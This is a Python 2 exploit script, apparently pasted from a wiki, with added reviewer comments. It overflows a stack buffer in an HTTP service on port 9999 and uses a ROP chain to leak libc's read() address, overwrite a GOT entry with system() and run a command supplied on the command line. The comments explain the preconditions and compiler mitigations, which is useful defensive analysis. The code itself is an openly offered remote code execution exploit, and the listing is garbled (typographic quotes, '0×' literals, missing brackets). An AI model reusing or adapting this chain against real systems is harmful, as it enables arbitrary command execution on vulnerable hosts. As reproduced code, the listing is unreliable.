
#!/usr/bin/python
import os, sys, socket
import struct
import requests

# Reviewer notes on this listing (comments only; the code is left exactly as
# pasted):
#  - Python 2 script (print statements, str concatenated with packed bytes).
#    As rendered on the wiki it is not valid Python: typographic quotes,
#    "0×" in place of "0x" and dropped index brackets are paste artefacts.
#    `requests` is imported above but never used.
#  - What the code visibly does: builds one oversized HTTP request line
#    (a 568-byte filler followed by little-endian 64-bit values), sends it,
#    reads 8 bytes back, rebases two hard-coded libc offsets from the leaked
#    value, and sends the result back on the same socket.
#  - Preconditions the writes below rely on, from a defender's view: fixed
#    0x40xxxx code addresses (so the binary appears to be non-PIE), a
#    writable GOT/.dynamic (so no Full RELRO), and an unprotected stack
#    buffer. Building with -fPIE/-pie, -Wl,-z,relro,-z,now and
#    -fstack-protector would invalidate each of these assumptions —
#    NOTE(review): confirm against the target binary's actual build flags.
addr = (‘127.0.0.1’, 9999)  # target service; fixed loopback host and port
cmd = sys.argv1+"\0"  # NUL-terminated string taken from the first CLI argument

# Offsets of read() and system() inside one specific libc build.
# NOTE(review): these are build-specific and the libc version is not recorded
# on the page; they do not transfer to another libc.
libcread_offset = 0xe8050
libcsystem_offset = 0×42510

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)  # plain TCP, no timeout set

payload = r’GET /\AAAA’  # request line prefix; "\AAAA" is the 5 chars counted below

#filler – fill buffer to 568 less initial payload of \AAAA (5)
# NOTE(review): a fixed-size stack buffer overrun like this is exactly what a
# stack canary (-fstack-protector) is designed to abort on.
payload += ‘A’ * (568 -5)

#write stdin to .dynamic using read@plt (0000000000400cf0 <read@plt>:)
# Everything from here on is raw 8-byte little-endian values appended to the
# request line, so the wire request is several hundred bytes of mostly
# non-printable data — a request-line length limit or a check for
# non-printable bytes in the request line would reject it at the edge.
someother = struct.pack(“<Q”, 0×000400cf0) #read() call loc
someother += struct.pack(“<Q”, 0×0004011dd) #pop rdi; ret
someother += struct.pack(“<Q”, 0) #stdin #fd arg

someother += struct.pack(“<Q”, 0×0004011db) #pop rsi; pop r15; ret
someother += struct.pack(“<Q”, 0×000602e28) #.dynamic addr
someother += “0xFF” # junk for r15

#leak address of read() in randomised libc
someother += struct.pack(“<Q”, 0×400c50) #write() call loc
someother += struct.pack(“<Q”, 0×0004011dd) #pop rdi; ret
someother += struct.pack(“<Q”, 1) #stdout # fd arg

someother += struct.pack(“<Q”, 0×0004011db) #pop rsi; pop r15; ret
someother += struct.pack(“<Q”, 0×000603088) #read() in GOT
someother += “0xFF” #junk for r15

#call read@plt to overwrite the ptr stored in GOT
# NOTE(review): this write only succeeds while the GOT is writable; Full RELRO
# (-Wl,-z,relro,-z,now) maps it read-only after relocation.
someother += struct.pack(“<Q”, 0×000400cf0) #read() call loc
someother += struct.pack(“<Q”, 0×0004011dd) #pop rdi; ret
someother += struct.pack(“<Q”, 0) #stdin # fd arg

someother += struct.pack(“<Q”, 0×0004011db) #pop rsi; pop r15; ret
someother += struct.pack(“<Q”, 0×000603088) #read() in GOT
someother += “0xFF” # junk for r15

#call read@plt with address of system() in libc
someother += struct.pack(“<Q”, 0×000400cf0) #read() call loc
someother += ‘FFFFFFFF’ # bogus
someother += struct.pack(“<Q”, 0×000602e28) #.dynamic addr system()

payload = payload + someother  # filler + packed values form the whole request line

s.connect(addr)

# Whole request in one send(); headers are separated with bare '\n', not the
# CRLF the HTTP spec calls for, and the Host/User-Agent values are fixed
# strings (easy to fingerprint in server logs).
s.send(payload+’ ’+r’HTTP/1.1’+’\n’+’Host: localhost:9999’+’\n’+’User-Agent: curl/7.60.0’+’\n’+’Accept: /‘+’\n’+’\n’+’\n’)

s.send(cmd)  # the CLI string, sent after the request for the server side to read

#calculate system() addr and send back
# recv(1024) may return fewer or more than 8 bytes; struct.unpack("<Q")
# requires exactly 8, so a short or long read raises struct.error here.
readaddr = struct.unpack(“<Q”, s.recv(1024))0 #keep this line
print “libc read() found at 0x%.8x” % readaddr #keep this line
# leaked read() minus its offset gives the libc base; add the system() offset
systemaddr = readaddr – libcread_offset + libcsystem_offset
print “libc system() found at 0x%.8x” % systemaddr
s.send(struct.pack(“<Q”, systemaddr))  # 8 bytes, consumed by the final read in the chain

print s.recv(1024)  # whatever the service returns, printed raw (Python 2 print)

# Bug: attribute reference, not a call — close() is never invoked and the
# socket is only released when the interpreter exits.
s.close
